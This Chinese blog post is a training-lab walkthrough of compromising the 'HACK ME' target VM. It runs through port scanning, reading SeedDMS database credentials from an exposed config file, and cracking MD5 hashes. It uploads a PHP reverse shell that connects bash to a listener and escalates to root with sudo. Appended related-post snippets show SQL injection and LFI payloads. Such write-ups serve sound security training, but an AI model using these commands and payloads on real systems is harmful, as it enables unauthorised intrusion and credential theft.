HACK ME靶机

已于 2023-11-26 23:24:53 修改
阅读量1.1k 收藏
点赞数
分类专栏: 信息安全 文章标签: 网络攻击模型 网络安全
于 2022-10-01 11:11:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49101841/article/details/127132432
版权

❀本篇关于信息安全实训时靶场训练的操作笔记。

零、环境准备

靶机及kali虚拟机可在如下链接中获取:
https://pan.baidu.com/s/1lEpAl-rM9utxcuOMde5_YA?pwd=kid8

一、 收集信息

  1. 探测目标靶机的IP地址
    在这里插入图片描述

  2. 获取靶机开放端口
    nmap 192.168.149.0/24 -v
    在这里插入图片描述
    可以看到192.168.149.142开放了80、3306端口
    接下来查看具体端口信息:nmap -p- -sV 192.168.149.142
    在这里插入图片描述
    可看到80端口和3306数据库端口均开放。知道他是靶机ip。

  3. 访问192.168.149.142:80,发现是一个内容网站
    在这里插入图片描述
    访问192.168.149.142:3306
    在这里插入图片描述

  4. 扫描目录dirsearch -u http://192.168.149.142/
    在这里插入图片描述
    以此访问图中显示的路径,未找到有用的信息。

  5. 在网页源码调用的js中发现http://192.168.149.142/js/main.js该路径,访问发现这句话和路径:
    //make sure this js file is same as installed app on our server endpoint: /seeddms51x/seeddms-5.1.22/
    在这里插入图片描述

  6. 访问该路径http://192.168.149.142/seeddms51x/seeddms-5.1.22/,发现是SeedDMS的登录口。
    在这里插入图片描述
    同时得到版本是5.1.22的信息:
    在这里插入图片描述

  7. 在网上搜索SeedDMS信息,查看该系统的文件目录获取更多信息。
    查看 目录树:https://sourceforge.net/p/seeddms/code/ci/5.1.22/tree/,发现有一个conf配置文件。Conf文件包含服务器的配置,多存在敏感信息
    在这里插入图片描述
    点击conf
    在这里插入图片描述
    查看settings.xml.template,发现该文件中要求写入数据库信息,从中可得mysql账号和密码
    在这里插入图片描述

  8. 访问setting.xml:http://192.168.149.142/seeddms51x/conf/settings.xml。可看到默认数据库账户和用户名。
    在这里插入图片描述

  9. 使用Navicat for MySQL,成功登入。
    (1)在seeddms数据库的users表中,看到存了个用户和密码
    在这里插入图片描述
    Saket:fad47f2f6b1752602ded932fe1bff65e。使用破解网站得到:
    在这里插入图片描述

(2)在tblUsers表中还有个admin用户
admin:e10adc3949ba59abbe56e057f20f883e
在这里插入图片描述

使用破解网站,解开得到密码为:123456
在这里插入图片描述

二、 渗透

  1. 访问http://192.168.149.142/seeddms51x/seeddms-5.1.22/ 。使用admin:123456登录
    在这里插入图片描述
    成功登入
    在这里插入图片描述
    有个“添加文档”的功能可以上传文档,考虑上传php的反弹shell

  2. 先在VPS开启端口监听
    在这里插入图片描述

  3. 可以使用在线反弹 shell 生成工具:https://forum.ywhack.com/reverse-shell/,复制红框里的内容保存在本地为 1.php
    在这里插入图片描述
    在这里插入图片描述

也可以直接创建1.php文件后输入:

<?php system("bash -c 'bash -i >& /dev/tcp/192.168.149.145/1234 0>&1'");?>

  1. 点击“添加文档”按钮,上传1.php
    在这里插入图片描述
    点击“添加”后,页面显示空白
    在这里插入图片描述
    但是返回首页时,发现是成功上传了的
    在这里插入图片描述

  2. 文件上传成功,需要获取路径,此版本存在文件上传漏洞:Exploithttps://www.exploit-db.com/exploits/47022,
    在这里插入图片描述

  3. 绝对路径为http://192.168.149.142/seeddms51x/data/1048576/dir 号/1.php,通过数据库的 tblDocumentContent 表里发现了上传的文件确定 dir 号。Dir为13。
    在这里插入图片描述

  4. 打开 VPS 的监听,然后再浏览器访问此路径的 php 文件:http://192.168.149.142/seeddms51x/data/1048576/13/1.php
    在这里插入图片描述
    在这里插入图片描述

  5. 使用命令 python3 -c "import pty; pty.spawn(‘/bin/bash’)"得到一个稳定的 shell
    在这里插入图片描述

三、 提权

  1. 进入 home 文件夹查看,发现有 saket 的文件
    在这里插入图片描述

  2. users 表中存在 saket 账户,因此切换用户到 saket,密码为:202219jk
    在这里插入图片描述

  3. sudo -l 查看可以执行的所有权限
    在这里插入图片描述

  4. 运行直接使用 sudo su, 得到 root 权限
    在这里插入图片描述

  5. 查看/root/flag
    在这里插入图片描述

  6. 根据提示,使用Navicat for MySQL创建表iam
    在这里插入图片描述

算吧啦
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackme(web wp)
Xi4or0uji
09-06 4274
oj说了不要直接给flag,所以就只写思路啦~ hide and seek 源码就有了 Guestbook 这题是SQL注入 看数据库 ?mod=read&amp;id=-1 union select 1,2,database(),4# 然后就看到数据库是g8 表 ?mod=read&amp;id=-1 union select 1,2,(select table_name fr...
hackme 边做边记录
m1785717的博客
10-22 598
LFI 在login界面查看源代码得到提示 &lt;a href="?page=pages/flag"&gt;Flag&lt;/a&gt; 想到使用封装协议读取php文件,URL如下: https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/flag 得到php源码 Q...
靶机渗透】HACKME: 1
安全狐
07-19 902
靶机渗透】HACKME: 1 本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME: 1 0x01靶机介绍 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布日期 2019年7月18日 作者 x4bx54 难度 初学者,简单 2. 描述 'hackme' is a beginner difficulty level box. The goal is to gain limite
[攻防世界]hackme
逆向萌新的博客
06-23 265
[攻防世界]hackme
Hackme-Crypto-wp
qq_41509200的博客
09-13 554
Hackme-Crypto-wp 背景: 这几天老师要求我们把hackme的题目做出来,于是便开始了新的征程,一定把全部flag找出来,fighting… 题目及解题思路 1、easy 526b78425233745561476c7a49476c7a4947566863336b7349484a705a3268305033303d 利用经验觉得像16进制转字符串,于是找个在线网站试试 还真有点...
hack me please靶机攻略.docx
10-19
"hack me please靶机攻略" 本资源为一份详细的靶机攻略文档,涵盖了从主机发现到获取 root 权限的整个过程。下面是从文档中提取的关键知识点: 一、主机发现 * 使用 nmap 工具进行主机发现和端口扫描,命令为:...
HackTheBox靶机系列之困难Reel
04-09
HackTheBox靶机系列之困难Reel 本篇文章主要介绍了Reel靶机的整个利用过程,从侦察到提权,涵盖了渗透测试、漏洞利用、信息收集等多个方面的知识点。 侦察阶段 在Reel靶机中,我们首先进行了侦察,扫描了21、22、...
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Hackme-Web-wp
qq_41509200的博客
09-13 2088
Hackme-Web-wp 背景: 这几天老师要求我们把hackme的题目做出来,于是便开始了新的征程,一定把全部flag找出来,fighting… 题目及解题思路 1、hide and seek Can you see me? I’m so close to you but you can’t see me. 题目描述说离我很近,于是便翻翻网页源代码,果真发现了flag FLAG{0h U...
Hackme Writeup
热门推荐
wywwzjj
05-21 1万+
https://wywwzjj.top/2019/02/02/Hackme-Writeup/ hide and seek Can you see me? I’m so close to you but you can’t see me. 这题查看源码即可。 guestbook This guestbook sucks. sqlmap is your friend. 既然提示有 sqlmap...
攻防世界--hackme
Hk_Mayfly的博客
01-18 258
测试链接:https://adworld.xctf.org.cn/media/task/attachments/33009710e3f44f04b5a4cdbaaa46f00a 1.准备 获取信息 64位文件 2.IDA打开 __int64 __fastcall sub_400F8E(__int64 a1, __int64 a2) { char v3[136]; // [rs...
攻防世界-hackme
qq_70851535的博客
11-19 307
逆向分析
攻防世界逆向高手题之hackme
沐一 · 林 的博客
08-30 972
攻防世界逆向高手题之hackme 继续开启全栈梦想之逆向之旅~ 这题是攻防世界逆向高手题的hackme 下载附件,照例扔入exeinfope中查看信息: 64位ELF文件无壳,照例扔入IDA64中查看伪代码信息,有main函数看main函数,结果没有main函数: . 没有main函数就运行程序收集显示信息: 找到两个字符串,直接在strings窗口双击跟踪,找到主要逻辑函数: . 这里积累第一个经验:如第一个红框所示, sub_407470((unsigned int)“Give me the
靶场-hackeme1
weixin_58602402的博客
06-12 137
1.在/home/legacy路径下发现二进制文件touchmenot,执行二进制文件。Linux OS' order by 1# //正常。Linux OS' order by 4# //不正常。3.编写反弹shell的脚本,shell.py,并利用蚁剑上传并执行。Linux OS' order by 3# //正常。Linux OS' and 1=2 # //不正常。Linux OS' and 1=1 # //正常。7.爆破数据库名,用户名,版本号。
hackme-1初级渗透测试
jrdh的博客
11-26 1586
Hackme-1环境搭建1. 详情2. 描述一:信息收集0x01主机发现端口扫描服务扫描服务器指纹信息查询网站目录爆破二:漏洞发现创建用户SQL注入MD5解密文件上传漏洞漏洞验证三:漏洞利用反弹shell法一: 一句话木马四:提权 环境搭建 测试机:kali:192.168.10.153 靶机hackme-1:192.168.10.155 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布日期 2019年7月18日 作者 x4bx54 难度 初
hackme inndy pwn rsbo writeup
charlie_heng的专栏
01-01 613
因为rsbo和rsbo2是同一题,所以就直接做rsbo2了 首先看看程序 init函数那里用时间和flag生成了一个seed,所以不能预测rand产生的值 然后是读了0x80个byte,这里有一个栈溢出 但是接下来那个for循环就有点棘手了,想了半天想不到,就去看了下别人的wp,发现是送了104个字节的\x00,这里这样做的原因是当修改到v8的值的时候,可以修改为0,这样就跳出for循...
靶机渗透 HACKME-2 (详细渗透,适合新手渗透)
君莫hacker的博客
09-06 3541
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值